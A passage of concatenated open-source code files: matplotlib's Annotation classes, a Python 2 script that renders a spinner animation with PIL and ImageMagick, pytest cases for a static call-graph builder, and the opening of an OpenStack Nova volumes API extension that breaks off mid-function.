            tr1 = self._get_xy_transform(renderer, s1)
            tr2 = self._get_xy_transform(renderer, s2)
            tr = blended_transform_factory(tr1, tr2)
            return tr
        if six.callable(s):
            # A callable must yield either a bbox or a transform.
            tr = s(renderer)
            if isinstance(tr, BboxBase):
                return BboxTransformTo(tr)
            elif isinstance(tr, Transform):
                return tr
            else:
                raise RuntimeError("unknown return type ...")
        if isinstance(s, Artist):
            bbox = s.get_window_extent(renderer)
            return BboxTransformTo(bbox)
        elif isinstance(s, BboxBase):
            return BboxTransformTo(s)
        elif isinstance(s, Transform):
            return s
        elif not is_string_like(s):
            raise RuntimeError("unknown coordinate type : %s" % (s,))
        if s == 'data':
            return self.axes.transData
        elif s == 'polar':
            from matplotlib.projections import PolarAxes
            tr = PolarAxes.PolarTransform()
            trans = tr + self.axes.transData
            return trans
        # Remaining string forms look like "figure points": the first word
        # names the reference origin, the second the unit.
        s_ = s.split()
        if len(s_) != 2:
            raise ValueError("%s is not a recognized coordinate" % s)
        bbox0, xy0 = None, None
        bbox_name, unit = s_
        # if unit is offset-like
        if bbox_name == "figure":
            bbox0 = self.figure.bbox
        elif bbox_name == "axes":
            bbox0 = self.axes.bbox
        # elif bbox_name == "bbox":
        #     if bbox is None:
        #         raise RuntimeError("bbox is specified as a coordinate but "
        #                            "never set")
        #     bbox0 = self._get_bbox(renderer, bbox)
        if bbox0 is not None:
            xy0 = bbox0.bounds[:2]
        elif bbox_name == "offset":
            xy0 = self._get_ref_xy(renderer)
        if xy0 is not None:
            # reference x, y in display coordinate
            ref_x, ref_y = xy0
            from matplotlib.transforms import Affine2D
            if unit == "points":
                # dots per points
                dpp = self.figure.get_dpi() / 72.
                tr = Affine2D().scale(dpp, dpp)
            elif unit == "pixels":
                tr = Affine2D()
            elif unit == "fontsize":
                fontsize = self.get_size()
                dpp = fontsize * self.figure.get_dpi() / 72.
                tr = Affine2D().scale(dpp,
                                      dpp)
            elif unit == "fraction":
                w, h = bbox0.bounds[2:]
                tr = Affine2D().scale(w, h)
            else:
                raise ValueError("%s is not a recognized coordinate" % s)
            return tr.translate(ref_x, ref_y)
        else:
            raise ValueError("%s is not a recognized coordinate" % s)
    def _get_ref_xy(self, renderer):
        """
        return x, y (in display coordinate) that is to be used for a reference
        of any offset coordinate
        """
        if isinstance(self.xycoords, tuple):
            s1, s2 = self.xycoords
            if ((is_string_like(s1) and s1.split()[0] == "offset") or
                (is_string_like(s2) and s2.split()[0] == "offset")):
                raise ValueError("xycoords should not be an offset coordinate")
            x, y = self.xy
            x1, y1 = self._get_xy(renderer, x, y, s1)
            x2, y2 = self._get_xy(renderer, x, y, s2)
            # Blended coordinates: x from the first spec, y from the second.
            return x1, y2
        elif (is_string_like(self.xycoords) and
              self.xycoords.split()[0] == "offset"):
            raise ValueError("xycoords should not be an offset coordinate")
        else:
            x, y = self.xy
            return self._get_xy(renderer, x, y, self.xycoords)
        #raise RuntimeError("must be defined by the derived class")
    # def _get_bbox(self, renderer):
    #     if hasattr(bbox, "bounds"):
    #         return bbox
    #     elif hasattr(bbox, "get_window_extent"):
    #         bbox = bbox.get_window_extent()
    #         return bbox
    #     else:
    #         raise ValueError("A bbox instance is expected but got %s" %
    #                          str(bbox))
    def set_annotation_clip(self, b):
        """
        set *annotation_clip* attribute.
        * True: the annotation will only be drawn when self.xy is inside
          the axes.
        * False: the annotation will always be drawn regardless of its
          position.
        * None: the self.xy will be checked only if *xycoords* is "data"
        """
        self._annotation_clip = b
    def get_annotation_clip(self):
        """
        Return *annotation_clip* attribute.
        See :meth:`set_annotation_clip` for the meaning of return values.
        """
        return self._annotation_clip
    def _get_position_xy(self, renderer):
        "Return the pixel position of the annotated point."
        x, y = self.xy
        return self._get_xy(renderer, x, y, self.xycoords)
    def _check_xy(self, renderer, xy_pixel):
        """
        given the xy pixel coordinate, check if the annotation need to
        be drawn.
        """
        b = self.get_annotation_clip()
        if b or (b is None and self.xycoords == "data"):
            # check if self.xy is inside the axes.
            if not self.axes.contains_point(xy_pixel):
                return False
        return True
    def draggable(self, state=None, use_blit=False):
        """
        Set the draggable state -- if state is
        * None : toggle the current state
        * True : turn draggable on
        * False : turn draggable off
        If draggable is on, you can drag the annotation on the canvas with
        the mouse. The DraggableAnnotation helper instance is returned if
        draggable is on.
        """
        from matplotlib.offsetbox import DraggableAnnotation
        is_draggable = self._draggable is not None
        # if state is None we'll toggle
        if state is None:
            state = not is_draggable
        if state:
            if self._draggable is None:
                self._draggable = DraggableAnnotation(self, use_blit)
        else:
            if self._draggable is not None:
                self._draggable.disconnect()
            self._draggable = None
        return self._draggable
class Annotation(Text, _AnnotationBase):
    """
    A `Text` artist annotating a point *xy*, optionally connected to the
    text by an arrow (`~matplotlib.patches.FancyArrowPatch`).
    """
    def __str__(self):
        return "Annotation(%g,%g,%s)" % (self.xy[0],
                                         self.xy[1],
                                         repr(self._text))
    @docstring.dedent_interpd
    def __init__(self, s, xy,
                 xytext=None,
                 xycoords='data',
                 textcoords=None,
                 arrowprops=None,
                 annotation_clip=None,
                 **kwargs):
        '''
        Annotate the point ``xy`` with text ``s``.
        Additional kwargs are passed to `~matplotlib.text.Text`.
        Parameters
        ----------
        s : str
            The text of the annotation
        xy : iterable
            Length 2 sequence specifying the *(x,y)* point to annotate
        xytext : iterable, optional
            Length 2 sequence specifying the *(x,y)* to place the text
            at. If None, defaults to ``xy``.
        xycoords : str, Artist, Transform, callable or tuple, optional
            The coordinate system that ``xy`` is given in.
            For a `str` the allowed values are:
            ================= ===============================================
            Property          Description
            ================= ===============================================
            'figure points'   points from the lower left of the figure
            'figure pixels'   pixels from the lower left of the figure
            'figure fraction' fraction of figure from lower left
            'axes points'     points from lower left corner of axes
            'axes pixels'     pixels from lower left corner of axes
            'axes fraction'   fraction of axes from lower left
            'data'            use the coordinate system of the object being
                              annotated (default)
            'polar'           *(theta,r)* if not native 'data' coordinates
            ================= ===============================================
            If a `~matplotlib.artist.Artist` object is passed in the units are
            fraction if it's bounding box.
            If a `~matplotlib.transforms.Transform` object is passed
            in use that to transform ``xy`` to screen coordinates
            If a callable it must take a
            `~matplotlib.backend_bases.RendererBase` object as input
            and return a `~matplotlib.transforms.Transform` or
            `~matplotlib.transforms.Bbox` object
            If a `tuple` must be length 2 tuple of str, `Artist`,
            `Transform` or callable objects. The first transform is
            used for the *x* coordinate and the second for *y*.
            See :ref:`plotting-guide-annotation` for more details.
            Defaults to ``'data'``
        textcoords : str, `Artist`, `Transform`, callable or tuple, optional
            The coordinate system that ``xytext`` is given, which
            may be different than the coordinate system used for
            ``xy``.
            All ``xycoords`` values are valid as well as the following
            strings:
            =================   =========================================
            Property            Description
            =================   =========================================
            'offset points'     offset (in points) from the *xy* value
            'offset pixels'     offset (in pixels) from the *xy* value
            =================   =========================================
            defaults to the input of ``xycoords``
        arrowprops : dict, optional
            If not None, properties used to draw a
            `~matplotlib.patches.FancyArrowPatch` arrow between ``xy`` and
            ``xytext``.
            If `arrowprops` does not contain the key ``'arrowstyle'`` the
            allowed keys are:
            ==========   ======================================================
            Key          Description
            ==========   ======================================================
            width        the width of the arrow in points
            headwidth    the width of the base of the arrow head in points
            headlength   the length of the arrow head in points
            shrink       fraction of total length to 'shrink' from both ends
            ?            any key to :class:`matplotlib.patches.FancyArrowPatch`
            ==========   ======================================================
            If the `arrowprops` contains the key ``'arrowstyle'`` the
            above keys are forbidden. The allowed values of
            ``'arrowstyle'`` are:
            ============   =============================================
            Name           Attrs
            ============   =============================================
            ``'-'``        None
            ``'->'``       head_length=0.4,head_width=0.2
            ``'-['``       widthB=1.0,lengthB=0.2,angleB=None
            ``'|-|'``      widthA=1.0,widthB=1.0
            ``'-|>'``      head_length=0.4,head_width=0.2
            ``'<-'``       head_length=0.4,head_width=0.2
            ``'<->'``      head_length=0.4,head_width=0.2
            ``'<|-'``      head_length=0.4,head_width=0.2
            ``'<|-|>'``    head_length=0.4,head_width=0.2
            ``'fancy'``    head_length=0.4,head_width=0.4,tail_width=0.4
            ``'simple'``   head_length=0.5,head_width=0.5,tail_width=0.2
            ``'wedge'``    tail_width=0.3,shrink_factor=0.5
            ============   =============================================
            Valid keys for `~matplotlib.patches.FancyArrowPatch` are:
            ===============  ==================================================
            Key              Description
            ===============  ==================================================
            arrowstyle       the arrow style
            connectionstyle  the connection style
            relpos           default is (0.5, 0.5)
            patchA           default is bounding box of the text
            patchB           default is None
            shrinkA          default is 2 points
            shrinkB          default is 2 points
            mutation_scale   default is text size (in points)
            mutation_aspect  default is 1.
            ?                any key for :class:`matplotlib.patches.PathPatch`
            ===============  ==================================================
            Defaults to None
        annotation_clip : bool, optional
            Controls the visibility of the annotation when it goes
            outside the axes area.
            If `True`, the annotation will only be drawn when the
            ``xy`` is inside the axes. If `False`, the annotation will
            always be drawn regardless of its position.
            The default is `None`, which behave as `True` only if
            *xycoords* is "data".
        Returns
        -------
        Annotation
        '''
        _AnnotationBase.__init__(self,
                                 xy,
                                 xycoords=xycoords,
                                 annotation_clip=annotation_clip)
        # warn about wonky input data
        if (xytext is None and
            textcoords is not None and
            textcoords != xycoords):
            warnings.warn("You have used the `textcoords` kwarg, but not "
                          "the `xytext` kwarg. This can lead to surprising "
                          "results.")
        # clean up textcoords and assign default
        if textcoords is None:
            textcoords = self.xycoords
        self._textcoords = textcoords
        # cleanup xytext defaults
        if xytext is None:
            xytext = self.xy
        x, y = xytext
        Text.__init__(self, x, y, s, **kwargs)
        self.arrowprops = arrowprops
        self.arrow = None
        if arrowprops:
            if "arrowstyle" in arrowprops:
                arrowprops = self.arrowprops.copy()
                self._arrow_relpos = arrowprops.pop("relpos", (0.5, 0.5))
            else:
                # modified YAArrow API to be used with FancyArrowPatch
                shapekeys = ('width', 'headwidth', 'headlength',
                             'shrink', 'frac')
                arrowprops = dict()
                for key, val in self.arrowprops.items():
                    if key not in shapekeys:
                        arrowprops[key] = val  # basic Patch properties
            # The (0,0)->(1,1) endpoints are placeholders; real positions are
            # computed in _update_position_xytext() at draw time.
            self.arrow_patch = FancyArrowPatch((0, 0), (1, 1),
                                               **arrowprops)
        else:
            self.arrow_patch = None
    def contains(self, event):
        # Hit-test the text plus either arrow artist.
        contains, tinfo = Text.contains(self, event)
        if self.arrow is not None:
            in_arrow, _ = self.arrow.contains(event)
            contains = contains or in_arrow
        if self.arrow_patch is not None:
            in_patch, _ = self.arrow_patch.contains(event)
            contains = contains or in_patch
        return contains, tinfo
    @property
    def xyann(self):
        # Position of the annotation text (in anncoords units).
        return self.get_position()
    @xyann.setter
    def xyann(self, xytext):
        self.set_position(xytext)
    @property
    def anncoords(self):
        # Coordinate system of the annotation text (textcoords).
        return self._textcoords
    @anncoords.setter
    def anncoords(self, coords):
        self._textcoords = coords
    def set_figure(self, fig):
        # Propagate the figure to the arrow artists before the Text itself.
        if self.arrow is not None:
            self.arrow.set_figure(fig)
        if self.arrow_patch is not None:
            self.arrow_patch.set_figure(fig)
        Artist.set_figure(self, fig)
    def update_positions(self, renderer):
        """Update the pixel positions of the annotated point and the
        text.
        """
        xy_pixel = self._get_position_xy(renderer)
        self._update_position_xytext(renderer, xy_pixel)
    def _update_position_xytext(self, renderer, xy_pixel):
        """Update the pixel positions of the annotation text and the arrow
        patch.
        """
        # generate transformation,
        self.set_transform(self._get_xy_transform(renderer, self.anncoords))
        # ox0/oy0: the text's display position; may be recomputed below from
        # the arrow's relpos when arrowprops are present.
        ox0, oy0 = self._get_xy_display()
        ox1, oy1 = xy_pixel
        if self.arrowprops:
            x0, y0 = xy_pixel
            l, b, w, h = Text.get_window_extent(self, renderer).bounds
            r = l + w
            t = b + h
            xc = 0.5 * (l + r)
            yc = 0.5 * (b + t)
            d = self.arrowprops.copy()
            ms = d.pop("mutation_scale", self.get_size())
            self.arrow_patch.set_mutation_scale(ms)
            if "arrowstyle" not in d:
                # Approximately simulate the YAArrow.
                # Pop its kwargs:
                shrink = d.pop('shrink', 0.0)
                width = d.pop('width', 4)
                headwidth = d.pop('headwidth', 12)
                # Ignore frac--it is useless.
                frac = d.pop('frac', None)
                if frac is not None:
                    warnings.warn(
                        "'frac' option in 'arrowprops' is no longer supported;"
                        " use 'headlength' to set the head length in points.")
                headlength = d.pop('headlength', 12)
                # NB: ms is in pts
                stylekw = dict(head_length=headlength / ms,
                               head_width=headwidth / ms,
                               tail_width=width / ms)
                self.arrow_patch.set_arrowstyle('simple', **stylekw)
                # using YAArrow style:
                # pick the x,y corner of the text bbox closest to point
                # annotated
                xpos = ((l, 0), (xc, 0.5), (r, 1))
                ypos = ((b, 0), (yc, 0.5), (t, 1))
                dsu = [(abs(val[0] - x0), val) for val in xpos]
                dsu.sort()
                _, (x, relposx) = dsu[0]
                dsu = [(abs(val[0] - y0), val) for val in ypos]
                dsu.sort()
                _, (y, relposy) = dsu[0]
                self._arrow_relpos = (relposx, relposy)
                r = np.hypot((y - y0), (x - x0))
                shrink_pts = shrink * r / renderer.points_to_pixels(1)
                self.arrow_patch.shrinkA = shrink_pts
                self.arrow_patch.shrinkB = shrink_pts
            # adjust the starting point of the arrow relative to
            # the textbox.
            # TODO : Rotation needs to be accounted.
            relpos = self._arrow_relpos
            bbox = Text.get_window_extent(self, renderer)
            ox0 = bbox.x0 + bbox.width * relpos[0]
            oy0 = bbox.y0 + bbox.height * relpos[1]
            # The arrow will be drawn from (ox0, oy0) to (ox1,
            # oy1). It will be first clipped by patchA and patchB.
            # Then it will be shrunk by shrinkA and shrinkB
            # (in points). If patch A is not set, self.bbox_patch
            # is used.
            self.arrow_patch.set_positions((ox0, oy0), (ox1, oy1))
            if "patchA" in d:
                self.arrow_patch.set_patchA(d.pop("patchA"))
            else:
                if self._bbox_patch:
                    self.arrow_patch.set_patchA(self._bbox_patch)
                else:
                    # No bbox patch: clip the arrow against a padded
                    # rectangle around the text (none at all if empty text).
                    pad = renderer.points_to_pixels(4)
                    if self.get_text().strip() == "":
                        self.arrow_patch.set_patchA(None)
                        return
                    bbox = Text.get_window_extent(self, renderer)
                    l, b, w, h = bbox.bounds
                    l -= pad / 2.
                    b -= pad / 2.
                    w += pad
                    h += pad
                    r = Rectangle(xy=(l, b),
                                  width=w,
                                  height=h,
                                  )
                    r.set_transform(mtransforms.IdentityTransform())
                    r.set_clip_on(False)
                    self.arrow_patch.set_patchA(r)
    @allow_rasterization
    def draw(self, renderer):
        """
        Draw the :class:`Annotation` object to the given *renderer*.
        """
        if renderer is not None:
            self._renderer = renderer
        if not self.get_visible():
            return
        xy_pixel = self._get_position_xy(renderer)
        if not self._check_xy(renderer, xy_pixel):
            # Clipped: the annotated point is outside the axes.
            return
        self._update_position_xytext(renderer, xy_pixel)
        self.update_bbox_position_size(renderer)
        if self.arrow_patch is not None:   # FancyArrowPatch
            if self.arrow_patch.figure is None and self.figure is not None:
                self.arrow_patch.figure = self.figure
            self.arrow_patch.draw(renderer)
        # Draw text, including FancyBboxPatch, after FancyArrowPatch.
        # Otherwise, a wedge arrowstyle can land partly on top of the Bbox.
        Text.draw(self, renderer)
    def get_window_extent(self, renderer=None):
        '''
        Return a :class:`~matplotlib.transforms.Bbox` object bounding
        the text and arrow annotation, in display units.
        *renderer* defaults to the _renderer attribute of the text
        object. This is not assigned until the first execution of
        :meth:`draw`, so you must use this kwarg if you want
        to call :meth:`get_window_extent` prior to the first
        :meth:`draw`. For getting web page regions, it is
        simpler to call the method after saving the figure. The
        *dpi* used defaults to self.figure.dpi; the renderer dpi is
        irrelevant.
        '''
        if not self.get_visible():
            return Bbox.unit()
        # NOTE(review): self.arrow is set to None in __init__ and never
        # reassigned in this class, so the arrow_patch branch appears to be
        # the live one -- confirm against subclasses/legacy setters.
        arrow = self.arrow
        arrow_patch = self.arrow_patch
        text_bbox = Text.get_window_extent(self, renderer=renderer)
        bboxes = [text_bbox]
        if self.arrow is not None:
            bboxes.append(arrow.get_window_extent(renderer=renderer))
        elif self.arrow_patch is not None:
            bboxes.append(arrow_patch.get_window_extent(renderer=renderer))
        return Bbox.union(bboxes)
docstring.interpd.update(Annotation=Annotation.__init__.__doc__)
| apache-2.0 |
CCPorg/PAS-PastaCoin-Ver-631-Original | share/qt/make_spinner.py | 4415 | 1035 | #!/usr/bin/env python
# W.J. van der Laan, 2011
# Make spinning .mng animation from a .png
# Requires imagemagick 6.7+
# NOTE(review): uses xrange below, so this script is Python 2 only.
from __future__ import division
from os import path
from PIL import Image
from subprocess import Popen
SRC='img/reload_scaled.png'
DST='../../src/qt/res/movies/update_spinner.mng'
TMPDIR='/tmp'
TMPNAME='tmp-%03i.png'
NUMFRAMES=35
FRAMERATE=10.0
CONVERT='convert'
CLOCKWISE=True
DSIZE=(16,16)
im_src = Image.open(SRC)
# Mirror the source first for clockwise spin (paired with the negated
# rotation angle below).
if CLOCKWISE:
    im_src = im_src.transpose(Image.FLIP_LEFT_RIGHT)
def frame_to_filename(frame):
    # Temporary file path for a given frame index.
    return path.join(TMPDIR, TMPNAME % frame)
frame_files = []
# Render each frame: rotate by the frame's angle (sampled at half-step
# offsets so frames are centred in their interval), downscale, save.
for frame in xrange(NUMFRAMES):
    rotation = (frame + 0.5) / NUMFRAMES * 360.0
    if CLOCKWISE:
        rotation = -rotation
    im_new = im_src.rotate(rotation, Image.BICUBIC)
    im_new.thumbnail(DSIZE, Image.ANTIALIAS)
    outfile = frame_to_filename(frame)
    im_new.save(outfile, 'png')
    frame_files.append(outfile)
# Stitch the frames into a single MNG animation with ImageMagick's convert.
p = Popen([CONVERT, "-delay", str(FRAMERATE), "-dispose", "2"] + frame_files + [DST])
p.communicate()
| mit |
burlog/py-static-callgraph | tests/args.py | 2 | 7835 | # -*- coding: utf-8 -*-
#
# LICENCE MIT
#
# DESCRIPTION Test suite for variable assigns.
#
# AUTHOR Michal Bukovsky <michal.bukovsky@trilogic.cz>
#
import pytest, re
from functools import wraps
from callgraph.builder import CallGraphBuilder
from tests.helpers import dfs_node_names
def test_args_simple():
    # A local passed positionally must carry its inferred (str) type into
    # fun1, so the builder resolves the .strip() call on the parameter.
    def fun1(a):
        a.strip()
    def fun():
        a = ""
        fun1(a)
    builder = CallGraphBuilder()
    root = builder.build(fun)
    from callgraph.indent_printer import dump_tree
    dump_tree(root, lambda x: x.children)
    path = ["fun", "fun.fun1", "fun.fun1.strip"]
    assert list(dfs_node_names(root)) == path
def test_args_kwarg():
    # Same as test_args_simple, but the argument is passed by keyword.
    def fun1(a):
        a.strip()
    def fun():
        a = ""
        fun1(a=a)
    builder = CallGraphBuilder()
    root = builder.build(fun)
    from callgraph.indent_printer import dump_tree
    dump_tree(root, lambda x: x.children)
    path = ["fun", "fun.fun1", "fun.fun1.strip"]
    assert list(dfs_node_names(root)) == path
def test_args_from_return():
    # The argument's type must flow through a called function's return value
    # (fun2() -> str) into fun1's parameter.
    def fun1(a):
        a.strip()
    def fun2():
        return ""
    def fun():
        fun1(fun2())
    builder = CallGraphBuilder()
    root = builder.build(fun)
    from callgraph.indent_printer import dump_tree
    dump_tree(root, lambda x: x.children)
    path = ["fun", "fun.fun2", "fun.fun1", "fun.fun1.strip"]
    assert list(dfs_node_names(root)) == path
def test_args_stararg_simple():
    # Unpacking a literal list with * must bind the element type (str) to
    # fun1's positional parameter.
    def fun1(a):
        a.strip()
    def fun():
        a = [""]
        fun1(*a)
    builder = CallGraphBuilder()
    root = builder.build(fun)
    from callgraph.indent_printer import dump_tree
    dump_tree(root, lambda x: x.children)
    path = ["fun", "fun.fun1", "fun.fun1.strip"]
    assert list(dfs_node_names(root)) == path
def test_args_stararg_from_call():
    # Star-expansion of a call result: fun2's returned list feeds fun1.
    def fun2():
        return [""]

    def fun1(a):
        a.strip()

    def fun():
        fun1(*fun2())

    builder = CallGraphBuilder()
    root = builder.build(fun)
    from callgraph.indent_printer import dump_tree
    dump_tree(root, lambda x: x.children)

    path = ["fun", "fun.fun2", "fun.fun1", "fun.fun1.strip"]
    assert list(dfs_node_names(root)) == path
@pytest.mark.skipif(True, reason="static list/tuple implementation")
def test_args_stararg_opaque():
    # Skipped: star-expanding a list whose contents were built up
    # dynamically (append in a loop) is beyond the static list model.
    def fun1(a):
        a.strip()

    def fun():
        b = list("")
        for a in []:
            b.append(a)
        fun1(*b)

    builder = CallGraphBuilder()
    root = builder.build(fun)
    from callgraph.indent_printer import dump_tree
    dump_tree(root, lambda x: x.children)

    path = ["fun", "fun.list", "fun.append", "fun.fun1", "fun.fun1.strip"]
    assert list(dfs_node_names(root)) == path
def test_args_starkwarg_simple():
    # Double-star expansion of a literal dict; the value type should reach
    # fun1's parameter `a`.
    def fun1(a):
        a.strip()

    def fun():
        a = {"a": ""}
        fun1(**a)

    builder = CallGraphBuilder()
    root = builder.build(fun)
    from callgraph.indent_printer import dump_tree
    dump_tree(root, lambda x: x.children)

    path = ["fun", "fun.fun1", "fun.fun1.strip"]
    assert list(dfs_node_names(root)) == path
def test_args_starkwarg_from_call():
    # Double-star expansion of a call result. The returns after the first
    # are unreachable at runtime; presumably the static builder considers
    # every return, hence the int-typed {"a": 4} variant makes to_bytes
    # resolvable on fun1's return value.
    def fun2():
        return {"a": "1"}
        return {"b": "2"}
        return {"c": "3"}
        return {"a": 4}

    def fun1(a):
        a.strip()
        return a

    def fun():
        fun1(**fun2()).to_bytes(1, "big")

    builder = CallGraphBuilder()
    root = builder.build(fun)
    from callgraph.indent_printer import dump_tree
    dump_tree(root, lambda x: x.children)

    path = ["fun", "fun.fun2", "fun.fun1", "fun.fun1.strip", "fun.to_bytes"]
    assert list(dfs_node_names(root)) == path
def test_args_fun_starargs_simple():
    # Callee declares *args: a positional argument should land in args and
    # its element type be visible when iterating.
    def fun1(*args):
        for a in args:
            a.strip()

    def fun():
        fun1("")

    builder = CallGraphBuilder()
    root = builder.build(fun)
    from callgraph.indent_printer import dump_tree
    dump_tree(root, lambda x: x.children)

    path = ["fun", "fun.fun1", "fun.fun1.strip"]
    assert list(dfs_node_names(root)) == path
def test_args_fun_starargs_empty():
    # Calling a *args function with no arguments must not break analysis of
    # its body.
    def fun1(*args):
        "".strip()

    def fun():
        fun1()

    builder = CallGraphBuilder()
    root = builder.build(fun)
    from callgraph.indent_printer import dump_tree
    dump_tree(root, lambda x: x.children)

    path = ["fun", "fun.fun1", "fun.fun1.strip"]
    assert list(dfs_node_names(root)) == path
def test_args_fun_starargs_from_fun():
    # A call result feeding *args. fun2's second return is unreachable at
    # runtime; presumably included to exercise multi-return handling.
    def fun2():
        return ""
        return 3

    def fun1(*args):
        for a in args:
            a.strip()

    def fun():
        fun1(fun2())

    builder = CallGraphBuilder()
    root = builder.build(fun)
    from callgraph.indent_printer import dump_tree
    dump_tree(root, lambda x: x.children)

    path = ["fun", "fun.fun2", "fun.fun1", "fun.fun1.strip"]
    assert list(dfs_node_names(root)) == path
@pytest.mark.skipif(True, reason="list/tuple subscription")
def test_args_fun_starargs_subscription():
    # Skipped: reading args[0] requires modelling tuple subscription.
    def fun1(*args):
        args[0].strip()

    def fun():
        fun1("")

    builder = CallGraphBuilder()
    root = builder.build(fun)
    from callgraph.indent_printer import dump_tree
    dump_tree(root, lambda x: x.children)

    path = ["fun", "fun.fun1", "fun.fun1.strip"]
    assert list(dfs_node_names(root)) == path
def test_args_fun_starkwargs_simple():
    # Callee declares **kwargs; iterating it yields the (str) keys, so
    # strip() must resolve on them.
    def fun1(**kwargs):
        for a in kwargs:
            a.strip()

    def fun():
        fun1(a="")

    builder = CallGraphBuilder()
    root = builder.build(fun)
    from callgraph.indent_printer import dump_tree
    dump_tree(root, lambda x: x.children)

    path = ["fun", "fun.fun1", "fun.fun1.strip"]
    assert list(dfs_node_names(root)) == path
def test_args_fun_starkwargs_empty():
    # Calling a **kwargs function with no arguments must not break analysis.
    def fun1(**kwargs):
        "".strip()

    def fun():
        fun1()

    builder = CallGraphBuilder()
    root = builder.build(fun)
    from callgraph.indent_printer import dump_tree
    dump_tree(root, lambda x: x.children)

    path = ["fun", "fun.fun1", "fun.fun1.strip"]
    assert list(dfs_node_names(root)) == path
@pytest.mark.skipif(True, reason="dict subscription")
def test_args_fun_starkwargs_subscription():
    # Skipped: reading kwargs["a"] requires modelling dict subscription.
    def fun1(**kwargs):
        kwargs["a"].strip()

    def fun():
        fun1(a="")

    builder = CallGraphBuilder()
    root = builder.build(fun)
    from callgraph.indent_printer import dump_tree
    dump_tree(root, lambda x: x.children)

    path = ["fun", "fun.fun1", "fun.fun1.strip"]
    assert list(dfs_node_names(root)) == path
def test_args_fun_default_simple():
    # Default argument value: when the caller omits `a`, the default's str
    # type should be used for resolution inside fun1.
    def fun1(a=""):
        a.strip()

    def fun():
        fun1()

    builder = CallGraphBuilder()
    root = builder.build(fun)
    from callgraph.indent_printer import dump_tree
    dump_tree(root, lambda x: x.children)

    path = ["fun", "fun.fun1", "fun.fun1.strip"]
    assert list(dfs_node_names(root)) == path
@pytest.mark.skipif(True, reason="list/tuple subscription")
def test_args_fun_starargs_self():
    # Skipped: recovering `self` from args[0] in __init__ needs tuple
    # subscription support.
    class A:
        def __init__(*args):
            self = args[0]
            self.a = ""

    def fun():
        a = A()
        a.a.strip()

    builder = CallGraphBuilder()
    root = builder.build(fun)
    from callgraph.indent_printer import dump_tree
    dump_tree(root, lambda x: x.children)

    path = ["fun", "fun.A", "fun.strip"]
    assert list(dfs_node_names(root)) == path
@pytest.mark.skipif(True, reason="dict subscription")
def test_args_fun_starkwargs_self():
    # Skipped: recovering `self` from kwargs["self"] in __init__ needs dict
    # subscription support.
    class A:
        def __init__(**kwargs):
            self = kwargs["self"]
            self.a = ""

    def fun():
        a = A()
        a.a.strip()

    builder = CallGraphBuilder()
    root = builder.build(fun)
    from callgraph.indent_printer import dump_tree
    dump_tree(root, lambda x: x.children)

    path = ["fun", "fun.A", "fun.strip"]
    assert list(dfs_node_names(root)) == path
| mit |
luzheqi1987/nova-annotation | nova/api/openstack/compute/contrib/volumes.py | 1 | 25929 | # Copyright 2011 Justin Santa Barbara
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""The volumes extension."""
from oslo.utils import strutils
import webob
from webob import exc
from nova.api.openstack import common
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
from nova.api.openstack import xmlutil
from nova import compute
from nova import exception
from nova.i18n import _
from nova import objects
from nova.openstack.common import log as logging
from nova.openstack.common import uuidutils
from nova import volume
LOG = logging.getLogger(__name__)
authorize = extensions.extension_authorizer('compute', 'volumes')
authorize_attach = extensions.extension_authorizer('compute',
'volume_attachments')
def _translate_volume_detail_view(context, vol):
    """Maps keys for volumes details view.

    The detail view currently carries no data beyond the summary view, so
    this simply delegates.
    """
    return _translate_volume_summary_view(context, vol)
def _translate_volume_summary_view(context, vol):
    """Maps keys for volumes summary view.

    Converts an internal volume record into the camelCase dict shape the
    API returns.
    """
    d = {}

    d['id'] = vol['id']
    d['status'] = vol['status']
    d['size'] = vol['size']
    d['availabilityZone'] = vol['availability_zone']
    d['createdAt'] = vol['created_at']

    # Only attached volumes expose attachment details; otherwise keep the
    # list shape with a single empty dict.
    if vol['attach_status'] == 'attached':
        d['attachments'] = [_translate_attachment_detail_view(vol['id'],
            vol['instance_uuid'],
            vol['mountpoint'])]
    else:
        d['attachments'] = [{}]

    d['displayName'] = vol['display_name']
    d['displayDescription'] = vol['display_description']

    # Prefer the human-readable type name when the type record was loaded;
    # fall back to the raw type id.
    if vol['volume_type_id'] and vol.get('volume_type'):
        d['volumeType'] = vol['volume_type']['name']
    else:
        d['volumeType'] = vol['volume_type_id']

    d['snapshotId'] = vol['snapshot_id']
    LOG.audit(_("vol=%s"), vol, context=context)

    if vol.get('volume_metadata'):
        d['metadata'] = vol.get('volume_metadata')
    else:
        d['metadata'] = {}

    return d
def make_volume(elem):
    """Declare the attributes and children serialized on a volume element."""
    elem.set('id')
    elem.set('status')
    elem.set('size')
    elem.set('availabilityZone')
    elem.set('createdAt')
    elem.set('displayName')
    elem.set('displayDescription')
    elem.set('volumeType')
    elem.set('snapshotId')

    # Nested <attachments><attachment .../></attachments> structure.
    attachments = xmlutil.SubTemplateElement(elem, 'attachments')
    attachment = xmlutil.SubTemplateElement(attachments, 'attachment',
                                            selector='attachments')
    make_attachment(attachment)

    # Attach metadata node
    elem.append(common.MetadataTemplate())
class VolumeTemplate(xmlutil.TemplateBuilder):
    """XML serialization template for a single volume."""

    def construct(self):
        root = xmlutil.TemplateElement('volume', selector='volume')
        make_volume(root)
        return xmlutil.MasterTemplate(root, 1)
class VolumesTemplate(xmlutil.TemplateBuilder):
    """XML serialization template for a list of volumes."""

    def construct(self):
        root = xmlutil.TemplateElement('volumes')
        elem = xmlutil.SubTemplateElement(root, 'volume', selector='volumes')
        make_volume(elem)
        return xmlutil.MasterTemplate(root, 1)
class CommonDeserializer(wsgi.MetadataXMLDeserializer):
    """Common deserializer to handle xml-formatted volume requests.

    Handles standard volume attributes as well as the optional metadata
    attribute
    """

    metadata_deserializer = common.MetadataXMLDeserializer()

    def _extract_volume(self, node):
        """Marshal the volume attribute of a parsed request.

        :param node: Parsed XML document node.
        :returns: Dict of the recognized volume attributes (plus
                  'metadata' when a metadata child element is present).
        """
        vol = {}
        volume_node = self.find_first_child_named(node, 'volume')

        attributes = ['display_name', 'display_description', 'size',
                      'volume_type', 'availability_zone']
        for attr in attributes:
            if volume_node.getAttribute(attr):
                vol[attr] = volume_node.getAttribute(attr)

        metadata_node = self.find_first_child_named(volume_node, 'metadata')
